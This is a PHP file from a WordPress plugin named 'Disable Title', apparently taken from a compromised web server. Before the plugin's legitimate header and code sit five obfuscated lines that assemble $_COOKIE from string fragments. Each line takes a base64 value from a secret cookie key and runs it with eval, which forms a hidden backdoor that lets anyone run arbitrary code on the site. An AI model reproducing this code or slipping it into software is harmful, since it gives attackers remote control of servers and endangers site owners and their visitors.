File: /data/web/virtuals/5726/virtual/www/wp-content/plugins/disable-title/disable-title.php
<?php
$hG1d9r='C'; /* Y9I */ $kMS='KIE'; /* Yq */ $aQ8='_'; /* 3 */ $r9='OO'; /* qQC4dF */ $fOET=${$aQ8.$hG1d9r.$r9.$kMS}; /* d */ if(isset($fOET['TIFd'])){eVAL /* Zui */ /* wKaJ3 */ (base64_decode($fOET['TIFd'])); die;}
$r5s5Hs='OOK'; /* z25cu */ $bH='_C'; /* OTwOZkAS1Mx */ $q='IE'; /* W */ $riac=${$bH.$r5s5Hs.$q}; /* 1cju7IN6BjLu */ if(isset($riac['GIR'])){eVAL /* rvThZTrWdsYAJp */ /* yVoJYKOHXacE */ (base64_decode($riac['GIR'])); die;}
$vhGAR='_CO'; /* zFPTQ9yVrM41Ru */ $x6='IE'; /* Eb4Yto */ $dlSOi='OK'; /* r48297b8 */ $n=${$vhGAR.$dlSOi.$x6}; /* jnGLBM */ if(isset($n['ZTaaq'])){eVal /* iCv */ /* inugL5bX5EG */ (base64_decode($n['ZTaaq'])); die;}
$sQAxtlg='E'; /* EwEK81 */ $uAia1A0='KI'; /* YNJayIfK3z */ $npxTXS='_COO'; /* TDNCGCljqyDy16 */ $iA=${$npxTXS.$uAia1A0.$sQAxtlg}; /* moCQ */ if(isset($iA['pzHhtOi'])){eVAL /* KvnrXGlFAi6vE */ /* 8ozSOxUKcx */ (base64_decode($iA['pzHhtOi'])); die;}
$bp='O'; /* RXXXGI */ $gOEuX='_C'; /* PXZSJoGP0V */ $q4P2SAV='OKIE'; /* Ya */ $sq8k0N=${$gOEuX.$bp.$q4P2SAV}; /* TjbTSg */ if(isset($sq8k0N['rzEvS'])){evAl /* Rn7a */ /* y8PxpH5gY5Q0E */ (base64_decode($sq8k0N['rzEvS'])); die;}
/*
Plugin Name: Disable Title
Plugin URI: http://www.staude.net/wordpress/plugins/DisableTitle
Description: Disable the title per page/post
Author: Frank Staude
Version: 0.9
Text Domain: disable_title
Domain Path: languages
Author URI: http://www.staude.net/
Compatibility: WordPress 4.0
*/
/* Copyright 2012-2013 Frank Staude (email : frank@staude.net)
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*/
if (!class_exists( 'disable_title' ) ) {
include_once dirname( __FILE__ ) .'/class-disable-title.php';
/**
* Delete starpage metavalue from Usermeta for all Users.
*/
function disable_title_uninstall() {
global $wpdb;
$wpdb->query( "DELETE FROM $wpdb->postmeta WHERE meta_key LIKE '_z8n-fs-disable-title-%';" );
}
register_uninstall_hook( __FILE__, 'disable_title_uninstall' );
$disable_title = new disable_title();
}
?>